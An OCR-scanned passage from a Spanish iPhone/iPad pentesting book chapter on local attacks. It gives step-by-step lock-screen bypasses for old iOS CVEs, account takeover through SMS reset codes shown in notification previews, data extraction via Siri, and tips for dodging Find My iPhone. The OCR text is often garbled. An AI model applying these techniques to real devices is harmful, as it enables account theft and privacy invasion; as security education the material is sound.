programadores pueden configurar que las contraseñas estén disponibles en estas situaciones: 


- Always: La contraseña es accesible en el momento en que el sistema operativo ¡OS 
arranca. Es decir, basta con encender el terminal y cualquier servicio o programa corriendo 


en el sistema tendrá la capacidad de acceder a ellas. 


-  Whenunlocked: La contraseña solo estará accesible cuando el usuario tenga desbloqueado 
el terminal. En el momento en que este se bloquea la contraseña se elimina de la memoria y 


no está disponible para ningún proceso o servicio. 


- When locked: Estas claves solo están disponibles cuando el terminal está bloqueado, es 


decir, cuando el usuario no ha puesto el passcode. 


Capitulo II. Ataques locales (¡Phone Local Tricks) _ EN 


- After first Unlock: Las claves se liberan la primera vez que el terminal arranca, lucgo se 
quedan disponibles para todos los programas y no importa si el dispositivo está bloqueado 
o no, 


y que tener en cuenta que a partir de ¿OS 5 se cambió el nivel de seguridad de las contraseñas de 
redes Wi-Fi, pasando de Always (es decir, que se liberan nada más arrancar el dispositivo) a After 
1 Unlock, lo que indica que solo se conectará a una red | si el terminal ha sido desbloqueado 
ja vez. Esto será especialmente importante a la hora de decidir si se puede apagar el dispositivo o 
Si el terminal es un ¡OS 4, se puede apagar sin problemas el terminal, que volverá a conectarse 
las redes Wi-Fi cercanas, con lo que será posible saber qué redes busca aún sin tener el passcode. 


ompartir Internet 


diferencia de las contraseñas de la conexión de datos Edge o 3G, si el usuario ha configurado el 
:rminal para no solicitar el PIN de la red de telefonía, esta se libera nada más arrancar el terminal, 
que puede ser útil en escenarios en los que el sujeto tenga activada la opción de compartir Internet, 

que automáticamente levantará este servicio. Sin embargo, las conexiones solo se podrían hacer 
por los medios que estén establecidos en el servicio, y que podrian ser USB, Bluetooth o W En 
el caso de Wi-Fi ya se ha visto que en ¿OS 5 ù iOS 6, solo se conseguiria conectividad si se dispone 
del passcode, mientras que en USB o Bluetooth solo seria posible hacerlo desde un dispositivo con 
el que se haya realizado la asociación previamente, es decir, desde el ordenador de la víctima. 


La limitación es alta, pero en un caso en el que el passcode sea complejo y sea posible lograr 
conectividad se podría hacer un Jailbreak, instalar un servidor OpenSSH y conectarse al terminal 
para poder sacar la información allí contenida con procesos forenses. lo que implicaria “requisar el 
terminal”. Por ahora solo hay que fijarse en que tenga activados estos servicios, que se pueden ver 
con los iconos que aparecen en la parte superior de la pantalla de bloqueo. 


- Simbolo de Bluetooth si está activado el Bluetooth. 
- Simbolo de intensidad de señal si está activada la red Wi-Fi. 


-  Rarra azul, si está activado el servicio de compartición de Internet y alguien está conectado 
aél. 


El passcode en la grasa de la superficie 

Si se confirma que el terminal tiene un passcode de cuatro dígitos numéricos, tal vez se pueda 
adivinar, y ahí, cuanto menos aseado sea el objetivo mucho mejor. Esto es porque al usarse el dedo 
para teclear el código de desbloqueo, se está produciendo un contacto entre la grasa corporal y la 
pantalla del iPhone. 


Lo ideal es llevar un equipo forense profesional para analizar la grasa de la pantalla, pero si esto 
no es posible, el tener una fotografía de calidad permitiría hacer un análisis de las claves con más 
probabilidades de ser usadas en el terminal. 
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ng de disp: 


En la siguiente imagen, si se superpone un teclado grosso modo sobre ella, se puede apreciar que en 
la zona de teclado hay un sitio muy marcado, lo que parece indicar que en dicha zona se ha pulsado 
más de una vez. El resto de los sitios en la zona del teclado parecen más o menos con la misma 
probabilidad. Dependiendo de las opciones de configuración del terminal se podrán probar varias 
hay suerte y se consigue desbloquear. 


combinaciones de números para ver 


Imagen 02.13: Superficie de la pantalla de ¿Phone con manchas de dedos. 


Borrado de datos con número de passcodes erróneos 

Para evitar el número de intentos máximos, los usuarios pueden establecer un mecanismo de 
seguridad que hace que al fallar 10 veces, los datos del equipo sean borrados. Mo es fácil realizar 
esto, ya que a partir del quinto intento el terminal empezará a bloquearse temporalmente, lo que 
impide un ritmo de introducción rápido de códigos fallidos. 


No obstante, con tiempo suficiente. es posible forzar el borrado de los datos de un terminal, y obligar 
a la persona dueña del equipo a realizar un proceso de restauración desde el backup. 


General Bloqueo con código 


Con 


Imagen 02.14: Borrado de datos tras número de intentos erróneos desactivado. 


Hay que tener esto en cuenta cuando se quiera averiguar el código. ya que si se alcanza el número 
máximo de intentos puede que se borren los datos, y se pierda toda la información. 
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Previsualización de mensajes por pantalla 


primera de las opciones inseguras por defecto que tienen los terminales ¡OS es la de mostrar las 
visualizaciones de los mensajes por pantalla. Esto es algo que hace más cómodo para cl usuario la 

a de un SMS, un Whatsapp, una alerta de reunión o un mensaje de correo electrónico. pero que 
ne un riesgo para la privacidad de la persona. Para cualquier persona le bastará con observar la 
talla y acceder al contenido que allí se muestre, sin necesidad de desbloqucar el terminal. 


supuesto esto atenta contra la privacidad del usuario, y para evitar esto, versión a versión de 
, se ha ido creando un sistema mucho más granular de configuración, que permite al dueño del 
inal elegir hasta tres sitios diferentes para recibir las alertas y previsualizaciones de los mensajes 
cada una de las aplicaciones, lo que hace que al final siempre queden algunos por pantalla. Esto 
asi porque se debe ir, una a una en cada aplicación, configurando una previsualización o no de los 
ensajes que se van a recibir, lo que es un trabajo tedioso. 


Notificaciones Mensajes 


Imagen 02.15: Configuración de opciones de previsualización en mensajes SMS e iMessage. 


i esta es la configuración que tiene la víctima, cl alacante puede usar uno de los trucos más sencillos 
para rubarle cualquier cuenta de servicio que tenga asociado el número de teléfono para recuperar la 
contraseña, y la más evidente de todas estas es la cuenta de Gmail. 


Al dirigirse a las opciones de recuperación de contraseña de Gmail y solicitar la opción de “He 
olvidado mi contraseña”, una de las opciones que muestra es la de enviar un mensaje SMS al número 
de teléfono asociado a la cuenta. Si la cuenta está asociada al terminal ¿Phone del objetivo, bastará 
con solicitar esa opción, es necesario por lanto conocer el número de teléfono del objetivo. 


Una vez solicitado, cl atacante solo deberá esperar a que llegue el SMS con el código. En el caso de 
los correos electrónicos de Gmail. aparece el número de verificación que será necesario para robar 
la contraseña de un usuario, y apoderarse así de la cuenta. 
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Ayuda con las contraseñas para aramosf@gmail.com 
Recibir un código de verificación (a través de un SMS) en mi teléfono: +»=»===11 


Introducir número de teléfono compl Sugerencia: =»=.ws=11 


Imagen 02.16: Solicitud de recuperac 


de contraseña por SMS en Gmail. 


Este ataque no solo se puede hacer a Gmail, sino a cualquier sistema de recuperación de contraseñas 
que se haga por SMS, si el usuario tiene activada la previsualización de los mensajes. Esto también es 
trasladable a los sistemas de recuperación por correo electrónico, aunque suele ser más complicado 
que la información necesaria para recuperar la cuenta entre en la previsualización que ofrece el 
sistema operativo ¡OS. 


Como se puede ver, en el caso de /Jormail llega en dos mensajes, pero se puede ver perfectamente 
el código en el segundo de ellos, con lo cual es uno de los servicios que pueden ser atacables con 
esta técnica de previsualización SMS. Sin embargo, en el caso de que estén configuradas solo las 
opciones de recuperación por medio de un mensaje de correo clectrónico enviado a una cuenta 
asociada, esta estrategia no es válida ni para Google ni para Hotmail, ya que el mensaje es mucho | 
más largo y no se puede ver la URL que hay que utilizar en la previsualización. 


Equipo de cuentas M y 
Restablecimiento de cont... 


Imogen 02.17: Prev 


ualización de mensajes de recuperación de cuenta por e-mail y por SMS de Hotmail. 


Capítulo 11. Ataques locales (¡Phone Local Tricks) EN 


En cualquier caso, antes de realizar este ataque se deben conocer cuáles son las cuentas que interesa 
robar, el número de teléfono, y crear una matriz de conocimiento que permita elegir el mejor ataque 
ra cada uno de los casos. 


Servicio | Recuperación por SMS Recuperación por email 
Gmail Si No 

Hotmail Si No 

Empresa a e o | 


Tabla 02.03: Recuperación de mensajes por pantalla. 


'on esta información, el atacante se ahorrara hacer pruebas innecesarias con el terminal al que está 
cando, ya que al final no va a poder borrar el mensaje y puede que el dueño del terminal objeto 
del ataque sospeche y cambie la password antes de que el atacante pucda usar el código. Es por eso 
que este ataque tal vez sea conveniente hacerlo de forma coordinada y mandar la información a un 
¡compañero que en tiempo real cambie la password desde una ubicación base, 


. Desbloqueo de la pantalla de inicio sin conocer el 
passcode por medio de bugs 


Aunque pueda parecer imposible, dependiendo de la versión de ¡OS que tenga instalado el objetivo, 
És posible desbloyucar la pantalla de petición del passcode para acceder a determinadas partes del 
sistema operativo. listo es debido a fallos de seguridad un el código de bloqueo del terminal que 
ipple intenta parchear en la siguiente versión, pero si el usuario no tiene actualizado el sistema 
operativo a la última versión, entonces es posible acceder a esa información. A continuación se 
muestran casos conocidos de las últimas versiones de ¡OS. 


CVE-2012-0644: El desbloqueo por la SIM hasta iOS 5.0.1 


En los terminales iPhone con versiones desde ¡OS 3.0 hasla iOS 5.0.7, (independientemente del 
modelo de iPhone), es posible desbloquear el dispositivo mediante un sencillo truco con la SIM del 
mismo. Indicar que este fallo no permite acceder completamente al terminal y que solo deja acceder 
a la aplicación de llamar, desde la que se pueden acceder a los contactos que tenga el usuario. 


El fallo radica en el gesto de “desplazar para llamar” y cl proceso es bastante sencillo, lo que permite 
que en muy poco tiempo se puedan realizar los 3 o 4 intentos necesarios para conseguir desbloquear 
el Phone. Lo primero que hay que hacer es generar una llamada perdida, así que el atacante debe 
conocer el número de teléfono del objetivo. Se le realiza la llamada perdida, y aparecerá en la 
pantalla de desbloqueo. Cuando esté allí, se debe sacar la SIM, con lo que aparecerá una alerta de 
SIM no encontrada, tal y como se puede ver en la imagen siguiente. 
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Imagen 02.18: Alerta de No SIM. 


A partir de ese momento se debe introducir otra vez la SIM al tiempo que se intenta contestar a la 
llamada perdida, desplazando hacia la derecha el aviso de la llamada perdida. No siempre sale a la 
primera, pero tras unos pocos intentos se podrá acceder a la aplicación de llamadas desde la que 
se podrá, entre otras opciones, consultar el historial de llamadas, la lista de contactos, (con toda la 
información que haya de ellos), c incluso realizar llamadas. 


Una vez que se consiga el acceso, tiene la ventaja de que permite borrar del historial la llamada 
perdida usada para desbloquear el terminal, con lo que el objetivo no puede averiguar que ha sido 
víctima de un acceso no autorizado a su lista de contactos 


Para este ataque es conveniente que el atacante lleve encima una llave de SIM o que tenga siempre 
a mano un clip con el que pueda manipular aperturas de SIM. Este fallo está solucionado en ¡OS 
5.1 y se puede ver un ejemplo de cómo funciona todo el proceso en la siguiente URL: http://www. 
seguridadApple.com/2012/02/nuevo-bug-en-iPhone-ios-501-permite.html 


v 
CVE-2011-3440: El desbloqueo de la Smart Cover en iPad 2 con 
¡OS 5 


Este bug dio la vuelta al mundo y obligó a Apple a sacar ¡OS 5.0.1 con mucha prisa, ya que el fallo 
era y es muy fácil de explotar. No es un bug de iPhone, pero parece imposible no contarlo en este 
capitulo teniendo en cuenta que permite acceder absolutamente a todo el sistema operativo. 
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a explotarlo basta con pulsar el botón para apagar el ¿Pad 2 hasta que salga la pantalla de apagado 

la que hay que desplazar una ñecha hacia la derecha para confirmar que se desea apagar el iPad 2 
in ese momento, sin desplazar la flecha ni cancelar el proceso de apagado, se cierra la Smart Cover 
se vuelve a abrir. 


Imagen 02.19: Confirmación de apagado. 


Una vez abierta se seguirá mostrando la pantalla de confirmación de apagado, donde será suficiente 
con dar al botón de cancelar el proceso de apagado para acceder a todo el sistema operativo del iPad. 
Un proceso que dura menos de 10 segundos y que deja todo el ¿Pad a merced de cualquier atacante, Se 
puede ver un vídeo de esta demostración en: htip/wmiseguridadApple.com/2010/10/5 Segundos 
Ipara-saltarte-la-contrasena. limi 


CVE-2010-4012: El desbloqueo por llamada de emergencia en iOS 
4.0 y 4.1 
Este bug fue solucionado por Apple en ¡OS 4.2, pero los terminales iPhone con la versión 4.1 


cuentan con un bug que le permite a cualquier atacante acceder a la aplicación de contactos con un 
proceso extremadamente sencillo. Solo es necesario marcar un número de teléfono desde el teclado 
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de llamadas de emergencia y pulsar el botón de apagado para que el sistema operativo muestre 
la aplicación de llamadas, desde donde se puede acceder al historial de las mismas, a la lista de 
contactos y realizar las llamadas que se consideren oportunas. 


La llamada de emergencia aparecerá en el historial de llamadas, por lo que se debe borrar del mismo 
una vez que se acceda a la lista de contactos si se quiere evitar dejar algún rastro inneces: 
dispositivo. Se puede ver un vídeo con este ejemplo en la siguiente URI 


El bug con Activator y un iPhone iOS 4.3.3 con Jailbreak 


Solo por terminar de explicar los desbloqueos conocidos hay que hablar del bug que tuvo Activator, 
una popular aplicación para terminales con Jailbreak, que en la versión que se distribuyó con ¿Phone 
4.3.3 permitía acceder al sistema operativo solo con pulsar dos veces el botón de acción desde la 
pantalla de bloqueo. Esto es así debido a que Activator permite asignar acciones a cualquier gesto 
del terminal con la pantalla bloqueada, entre ellas la llamada a la cámara de fotos. Si se ha asignado 
cualquier combinación a la cámara se salta la protección de la pantalla de petición de código. 


Deslizar derecha 
Deliza a la derecha en la barra estado 


Deslizar izquierda 
Deliza a la izquierda en la barra estado 


Doble toque derecha 
Doble toque en la parte derecha de la... 


Doble toque izquierda 
da 


Doble toque en la parte izquí 


Presión corta 
Mantén presionada la barra de estado 


Presionar derecha 


Toca y mantén en la parte derecha de. 


Imagen 02.20: Opciones de Activator en la pantalla de bloqueo. 


Hay que decir que esta versión (la 4.3.3), es una de las más populares a dia de hoy entre los usuarios 
de la comunidad de Jailbreak, ya que fue la última que se pudo actualizar con JailbreakMe 3.0, el 
sitio web de Comex que liberaba el terminal con solo visualizar un documento PDF desde una web, 
Es por ello que, si el terminal es un ¡OS con 4.3.3 el atacante puede intentar darle dos clics al botón 
de acción, agitar el terminal, probar a desplazar de arriba abajo y de abajo arriba, etcétera, a ver si se 
abre el sistema operativo ante él, debido a que se haya configurado alguna aplicación que se salte el 
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ueo, tal y como se ha mencionado i ci íe ación 
la siguiente URL: 


-2013-0980: Saltar cl código de la pantalla de bloqueo en iOS 
a iOS 6.1.2 


ón de ¡OS a la versión 6.1 se añadió un nuevo hug que permite saltarse el código de 
lloqueo y acceder a la aplicación de contactos y de realización de llamadas. Dicho bug está en 
s los terminales con esta versión de software. Los pasos a realizar son los siguientes: 


1. Cuando el teléfono está bloqueado con PIN se debe ir a la pantalla de llamada de emergencias 
y ahí pulsar el botón de apagado hasta que salga la opción de confirmar el apagado o cancelar. 


2, Se cancela el proceso de apagado y se vuelve a la pantalla de llamadas de emergencia. Ahí 
se podrá ver ya que algo no ha ido bien pues aparece la barra de mensajes que se ve cuando el 
terminal está desbloqueado en la parte superior. 


3. Hacer una llamada de emergencia y colgar rápidamente. 
4. Volver a bloquear el terminal pulsando una vez el botón de encendido/apagado. 


5. Volver a encender la pantalla pulsando el botón de acción e ir a la pantalla de introducción 
del código PIN. 


6. Pulsar el botón de encendido/apagado durante 3 segundos. 


7. Antes de que salga la pantalla de confirmar o cancelar el proceso de apagado dar al botón de 
llamadas de emergencia. 


tarse el código de desbloqueo cn iPhone 3GS y en iPhone 4 con 
S 6.1.3 


día después de que se publicara a nivel mundial la nueva versión de ¿OS 6.1.3 que había sido 
ecialmente creada para solucionar el ya conocido hug de saltarse el passcode en iOS 6.X, se 
cubrió ya una nueva forma de saltarse la pantalla de bloqueo. 


Tallo se produce solo en los terminales que no tienen Siri, es decir, hasta ¿Phone 4, y no en iPhone 
o iPhone 5, y vuelve a producirse al generarse el evento de No SIM cuando se realiza una llamada 
n el Control de voz. 


ta con hacer una llamada de emergencia con el servicio de llamada de voz, y cuando empiece a 


lizarse la llamada sacar la SIM. Fácil y sencillo. A partir de ese momento se pueden acceder a los 
intactos y a las fotografías del terminal. 


iPhone & ¡Pad 


Un bug en LockDown Pro para iPhone con Jailbreak 


El último truco curioso que se puede hacer en local es para un terminal con Jailbreak en el que no 
hay passcode de por medio pero si un código de bloqueo de aplicaciones. Esto se puede hacer con 
herramientas muy populares, como LockDowaPro, que pedirán una clave de desbloqueo cuando se 
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quiera acceder a cualquier aplicación del 


Mensajes 


OS 
> Tico 
e Finalizar arer A 


pab X > tl 


Sin embargo, hace tiempo se descubrió que este bloqueo de aplicaciones no funciona cuando hay 
una llamada en curso, así que basta con que se llame desde otro número al teléfono con Jailbreak 
protegido por LockDown Pro y sin cancelar la llamada, pulsando en el botón de acción. se acceda a 
todas las aplicaciones del sistema. Es un fallo peculiar y muy concreto, aunque de una importancia 
considerable. 


5. Accediendo a las fotos de un iPad por las opciones 
del marco de fotos 


Una de las funciones más extrañas de ¿Pad es que se pensó para poder ser un marco de fotos digital 
en los hogares, por lo que. por defecto, cuando la pantalla de un ¿Pad está bloqueada aparece el 
icono de una fotografía que mostrará las fotografías guardadas en el carrete. En un ¡Ped de primera 
generación, donde no hay cámara de fotos, estas pueden haber sido cargadas por ¡Times o desde las 
adjuntos del correo electrónico, pero en ¿Pad 2, iPad 3 o el New new iPad, esas fotos pueden haber 
sido realizadas por el dispositivo, y pueden tener información útil. 


Imagen 02.22: Acceso a las fotos de iPad: Opción marco de foton. 
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un ¿Pad al alcance del atacante es posible que encuentre algo de información “jugosa” entre 
llos, ya que los usuarios suelen hacer fotos a casi “cualquier” cosa, por lo que con solo pulsar 
lo de la flor se podrá acceder a las imágenes y a su información. 


ediendo a las fotos de un iPhone con iOS 5.X cambiando la fecha 


tin bug muy curioso en la cámara de fotos en los terminales con ¿OS 5 gracias a que se permite 
jar con el equipo como si fuera una cámara de fotos sin necesidad de desbloquear el terminal. 
embargo, la protección que tiene iPhone es que se pueden hacer fotografías y acceder a aquellas 
he hayan realizado solo en esta sesión, es decir. las fotos del carrete están supuestamente a salvo, 


embargo, esta protección es muy pobre, ya que solo utiliza la fecha del dispositivo. Si la foto 
ia hecho en un momento posterior a la fecha en la que se bloqueó el sistema, se mostrará sin 
esidad de introducir el código para desbloquear el terminal, La pregunta que surge es ¿cómo se 
bia la fecha para ver las fotos? Pues las alternativas son pocas y peculiares, pero es posible, 


ii terminales ¿Pad 2, ¡Pad 3 o New new iPad (que salieron con ¡OS 5 o superior) que solo utilizan 
"i, usan un servido l que se conectan cada bastante tiempo, lo 
le ha llevado a que los eq adolecieran ¡zación del reloj y hubiera muchas quejas. 
este caso se podría intentar suplantar el servidor NTP en la red y darle una fecha de hace 1 año, 
que permitiría que se pudieran ver las fotos realizadas en el último año. 


iel caso de iPhone, la sincronización horaria se hace a través de las torres de comunicación de 
llefónica, que se encargan de enviar la hora correcta en cada reinicio. Esto abre la puerta a un ataque 
ediante una estación BTS falsa, tal y como se indica más adelante en este libro. Así que, con un 
que coordinado se podría cambiar la fecha desde una falsa estación de telefonía (es posible hacer 
il ataque dirigido y solo cambiar la hora de un único dispositivo) y la persona que tenga acceso 
drá ver las fotografías con solo activar la cámara. 


s necesario que el terminal tenga la configuración por defecto de “Configurar 
hora automáticamente ". 


| ajuste automático 
l 


juste automático de kora e ¿cono de acceso a la cámara en la pantalla de bloqueo. 


La última opción es un ataque con descuido o ingeniería social, pero es necesario contar con la 
ayuda de la víctima que debe ser engañada para que ponga una fecha anterior sin saber lo que está 
haciendo realmente. 
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6. Explorando la agenda usando el control de voz 


Apple introdujo Siri, un asistente virtual que se activa por la voz, (del que se va a hablar largo y 
tendido un poco más adelante) en ¿Phone 48 y está presente en ¿Phone 5. En los terminales ¡Phone 
o ¡Phone 3GS existe la posibilidad de utilizar el Control de voz para acceder a las opciones de hacer 
llamadas de voz o por medio de FaceTime. 


Generar Bloqueo con código 


Marcación por voz 


Imagen 02.24; Deshabilitar Voice Control cor. pantalls bloqueada 


Este servicio es posible desactivarlo dentro de las opciones de configuración, pero sin embargo 
se descubrió que hay un bug en todas las versiones de ¡OS 5.X para terminales ¡Phone 4 o iPhon 
3GS, que permite acceder a la lista de contactos y hacer llamadas por FaceTime con el termini 

bloqueado, a pesar de que haya sido deshabilitado este servicio. El fallo está en el módulo creadi 
para realizar las llamadas de emergencia. 


Para consultar la lista de contactos se debe entrar en el teclado de llamadas de emergencia, dej 
pulsado el botón de acción unos segundos y se activará el Control de voz. Desde él se pueden realiza! 
llamadas por FaceTime. 


Control por voz 


Varios r 


Imagen 02.25: Llamar por FaceTime. 


nan 
A KEI 
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La manera de utilizarlo es decir FaceTime y el nombre de un contacto. Si este está en la lista se podrá 
hacer la llamada. Si hay varios contactos con el mismo nombre o varios números o cuentas asociadas 
A un mismo contacto, se podrá ir eligiendo entre ellos. En cualquier caso, no se puede acceder a la 
Información personal de ninguno de ellos, y solo sirve para saber si está en la lista de contactos o 
para llamar a uno de los contactos que estén'en ella por FaceTime. 


Este fallo afecta a usuarios con ¿OS 3 y a usuarios con ¡OS 6.x con terminales ¡Phone 3GS o iPhone 
h, ya que en ellos no está disponible el uso de Siri. 


Manejando el teléfono con Siri en ¡OS 5 e iOS 6 con iPhone 4$ o 
iPhone 5 


ln los terminales ¿Phone 48, iPhone 5 y los ¡Pad 3, el principal juguete para sacar información de 
él sin necesidad de tener el passcode de desbloqueo es Siri. Este asistente personal va mucho más 
allá que un simple reconocimiento de órdenes por voz, y está preparado para hacer múltiples tarcas. 
Por defecto, está listo para hacerlas aun cuando el dispositivo está bloqueado, lo que permite sacar 
mucha información de él. 


Para activarlo basta con dejar pulsado el botón de acción y esperar que suene la música y salga Siri 
para atender al usuario, A partir de ese momento se le puede pedir que haga cosas con el dispositivo, 
Aquí se van a mostrar algunas de las posibilidades que se pueden obtener jugando con Siri 


Enviar mensajes y realizar llamadas a contactos: Sirí tiene la capacidad de enviar correos 
electrónicos, mensajes SMS, iMessage y realizar llamadas de teléfono o FaceTime a cualquier 
contacto de la agenda. Solo hay que pedírselo: “Enviar mensaje de correo electrónico a X”. 


Enviar mensajes y realizar llamadas a números de teléfono que no están en la agenda de 
contactos: Esto es perfecto para enviar un mensaje a un contacto y generar un conflicto del que sacar 
partido en un proceso de pentesting. 


Publicar en redes sociales: Con el dispositivo bloqueado, a través de Siri. es posible publicar Tweets 
o mensajes en Facebook, “Publica un weef” o “Publica un mensaje en Facebook” es suficiente para 
conseguir hacerlo, 


Consulta de citas en el calendario: Se puede hacer casi cualquier pregunta, como “¿Qué reuniones 
tengo en Marzo en el calendario?” “¿Qué reuniones tengo hoy?” “¿Cuándo tengo reunión con 
Chema?” Todas estas consultas se lanzan sobre la aplicación de Calendario, y aunque no se puede 
ver el detalle completo de cada entrada, si que es posible sacar información suficiente de él. 


Crear citas en el calendario: Una de las características más extrañas es la capacidad de crear 
reuniones con personas de los contactos en la agenda. Basta con utilizar una orden del tipo “Crear 
una reunión con X para mañana a las 8” y Siri creará la reunión, pudiendo configurar a gusto la 
agenda del objetivo. 
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é Crear una reunión co! 
Rodol para mañana por 
la mañana alas ocho * 


Cea 
reunion 
) raúniones ent Villar pare m 


© Módulo 4: Sogurida. 


A Gira Up To Socu 


Imagen 02.26: Consular y 


i está el 


Búsqueda de contactos: A diferencia del hug con FaceTime donde solo se puede saber 
contacto o no, y realizar una llamada por FaceTime, aquí se puede saber si está o no en la agenda, 
y acceder a toda la información del mismo, es decir, nombre, apellidos, números de teléfono, 
descripción y direcciones de email. con lo que es perfecto para extraer los datos sensibles que 


interesen. 


qué le T 


$ Buscar contacto Chema »» 


= 00 34 


wi First Name Rodo! 
Full Name ; Rodol 
Phone Number Mobile 
AE 


Imagen 02.27: Búsqueda de contactos. 
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tro de los contactos hay una consulta muy útil: Conocer los datos del dueño del terminal, para 
basta con preguntar “Muéstrame mi contacto”. 


alizar puntos de interés guardados en el GPS: También, con el dispositivo bloqueado, es 
ible buscar una ruta a un punto de interés como “Indícame cómo ir a casa de Raquel” o “Indicame 
0 llegar a mi case”. Automáticamente se generará una ruta cn Maps que le llevará hasta csa 
ación 


strar las notas creadas: Desde Siri, con un simple comando “Muéstrame todas las notas” se 
de acceder a los primeros caracteres de las notas que están creadas. Esto se puede filtrar por 
a, usando “Muéstrame las notas del 10 de Febrero”. Si se quiere ver el contenido de una nota, es 
sencillo como buscar una palabra en el título de la nota, poniendo “Búscame la nota amigos”, y 
no se puede ver en la imagen siguiente sale el contenido completo. 


posible también crear una nota y guardar cualquier información en ella, Además, si el terminal 
ne está sincronizado con iCloud, se podrán ver las notas creadas por todos los dispositivos 
izando la misma cuenta de Apple TD, por ejemplo un Mae u otro dispositivo como iPad. Tanto 
creación como la lectura de las notas será un proceso que se hará sobre todos los dispositivos 
ectados a la misma cuenta. 

66 Muéstrame la not: 


amigos 39 


Me gastado 12 € era 


AAA eee 


Imagen 02.28: Consulta de notas desde Siri. También se pueden crear notas. 


más de todas estas acciones. en las versiones de ¡OS 3.0 y 5.0.1 eon terminales i/'hone 15 es 
ible acceder al mensaje seleccionado en la aplicación Mai! haciendo uso de las opciones de 
viar por lo que Apple tuvo que solucionar este hug eniOS 5.1. Si la versión es un ¡OS 5.0 o iOS 
0.1 usando “Reenviar mensaje de correo electrónico” se podrá ver el contenido del mismo. 


que tener presente que Siri procesa la voz en los servidores de Apple. así que es necesario que el 
inal esté concetado a Internet a través de alguna conexión. Si no es así, entonces no funcionará 
guna de las funciones. Además. hay que tener en cuenta que en los servidores de Appfe quedarán 
istrados todos los comandos de voz, aunque no es habitual que en un proceso de peniesting 
guien los revise. 


E-2012-3750: Acceso a los códigos de PassBook 


n iOS 6 Apple introdujo PassBook, una aplicación para recibir las entradas digitales para cualquier 
jo de evento o espectáculo. Funciona como una cartera de recepción de entradas y por defecto está 
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habilitado con la pantalla bloqueada. En la versión ¡OS 6.0.1 se solucionó el bug CVE-2012-3750 
debido a que se comprobó que si se recibía el ticket con la pantalla bloqueada era posible acceder a 
la entrada y, por ejemplo, tirarle una foto para copiarla. 


7.Otras manipulaciones en local 


Juice Jacking 

Las técnicas de Juice Jacking salieron a la luz en la Defcon 19 de 2011, cuando se estableció un 
puesto para recargar la bateria de los móviles que informaba de que podía robar los datos. En los 
terminales iPhone, desde que se introdujo el cifrado de ¿Phone Data Protection, esto solo se puede 
hacer cuando se conoce el código de desbloqueo o mediante la explotación de un bug para hacer 
un tethering o untethering Jailbreak. Este no es el objetivo de este capítulo, que será tratado más 
adelanto, así que si el terminal tiene un passcode, con las lécnicas de Juice Jacking se podrá obtener 
algo de información, pero nada más. 


Simplemente conectando un terminal ¿Phone o ¡Pad sin desbloquear a un equipo Windows es posible 
obtener el número de serie, y la versión exacta del sistema operativo, en la imagen siguiente se 
aprecia el de un 105 5.1.7. Además. también se puede conocer el almacenamiento que tiene ocupado 
actualmente con fotografias, videos, notas o documentos. Sin embargo, a pesar de que aparezca la 
opción de importar fotografías, esto no va a ser posible en las versiones ¿OS 4.X o superiores sin 
desblogucar el terminal. 


ongen de 
naga: 


Internal Storage 
> 
GB dispeniales ce 28,5 GB 


Imagen 02.29: Información que se obtiene de un iPhone sin desbloquear en un Windows. 
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Si se desea hacer esto, es necesario tener un equipo preparado, y lo que es más importante, tener los 
cables de conexión de ¡Phone o iPad. A partir de iPhone 5 Apple decidió cambiar el conector, asi 
que hay que disponer de un conector “clásico” y del nuevo lightning. Para ello es posible utilizar 
conectores entre ambos. 


1.- Conector Clásico E s 


2. Adaptadores 


Imagen 02.30: Conectores y adaptadores para las pruebas de penresting. 


Más acciones con el terminal bloqueado que pueden ser útiles 

Por último, existen una seric de acciones con el terminal bloqueado que pueden utilizarse para Casos 
puntales, Tal vez no sean trucos de hacking. pero si se va a hacer pentesting de ¡Phone o iPads, 
entonces el atacante debe tener soltura con su manejo. Estas son las acciones que se pueden hacer 
sin poner el passcode y desbloquear el teléfono: 


Responder a una llamada de teléfono: Si alguien llama se puede contestar (es el 
funcionamiento normal de todos los teléfonos hoy en día). 
- Responder con llamada a una llamada perdida: La función se llama “Slide To Answ 
y está disponible en versiones ¡OS 5.X y superior. Si se visualizan los mensajes de llamadas 
perdidas por pantalla se puede devolver la llamada sin desbloquear el terminal. 

Responder con mensaje: En ¿OS 6, en caso de que haya una llamada activa, se puede 
desplazar el scroll hacia arriba para enviar un mensaje al usuario que está realizando la 
llamada. Esto se puede desactivar desde las opciones de configuración. 


azar ÑG Contestar Ma 


Imagen 02.31: Responder con un mensaje 
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Poner música: Basta con pulsar dos veces al botón de acción para acceder al panel de control de 
la música, lo que permite activar o desactivar el audio de la música que esté oyendo el dueño del 
terminal. Un buen truco en caso de querer saber qué música le gusta o si se desea escuchar la 
grabación que él esté escuchando. 


əb -~ Silenciar una llamada entrante: Si no se quiere cancelar la llamada y que el emisor de la 
misma detecte que no se ha querido contestar, es posible dar una vez al botón de bajar audio 
y se desactivará el sonido de la llamada. 
- Cancelar una llamada: Se hace con el botón de apagado, pero el remitente detectará que 
ha sido cancelada, 
-  Lncender/Apagar la pantalla: La pantalla desbloqueada se apaga a los pocos segundos. 
Sin embargo, tanto con el botón de acción como con el de encender/apagar el terminal, la 
pantalla se enciende. Para apagarla hay que pulsar una vez en el botón de encender/apagar. 
- Poner en modo vibración: Aunque se puede cambiar el comportamiento de “la pestaña 
lateral” de los ¿Phone 4, ¡Phone 48 o iPhone 5, por defecto su utilidad es para variar entre el 
modo silencio o no. 


- Extraer la SIM para poder analizar el contenido de la misma con un dispositivo de análisis 
forense, 

- — Apagar/Encender el terminal: Si hay que llevarse el terminal, y no se desea ser detectado 
con los servicios de Find My iPhone, entonces es necesario apagarlo antes de salir con él. 
Después, antes de encenderlo hay que asegurarse de que no existe ninguna Wi-Fi cerca y 
de haberle quitado la SIM al terminal. Esto es lo que hacen los ladrones y les funciona 
perfectamente. Si se enciende el terminal buscará conectarse a Internet, lo que permitirá 
descubrir qué redes Wi /'i está buscando para conectarse (incluso si están ocultas). 

- Hard reset: Se puede hacer un reinicio del terminal para forzar su apagado cuando se ha 
quedado bloqueado. Para ello se deben pulsar durante unos segundos el botón de acción y el 
de encendido. Ll terminal recibirá una orden de reinicio a nivel de hardware. 

- Hacer fotografías en ¡OS 5 o superior: Como se ha explicado con anterioridad. 

- Hacer capluras de pantalla del terminal: Aunque el terminal esté bloqueado se pueden 
hacer capturas de pantalla pulsando los botones de acción y apagado. Es ilimitado el número 
de capturas que se pueden hacer. ti 


El equipo pareado o el dispositivo con Jailbreak 

Antes de terminar, hay un tema importante a tener en cuenta. Durante todo este capitulo se supone 
que el atacante liene acceso local al lerminal sin tener cerca un equipo pareado, es decir, un equipo 
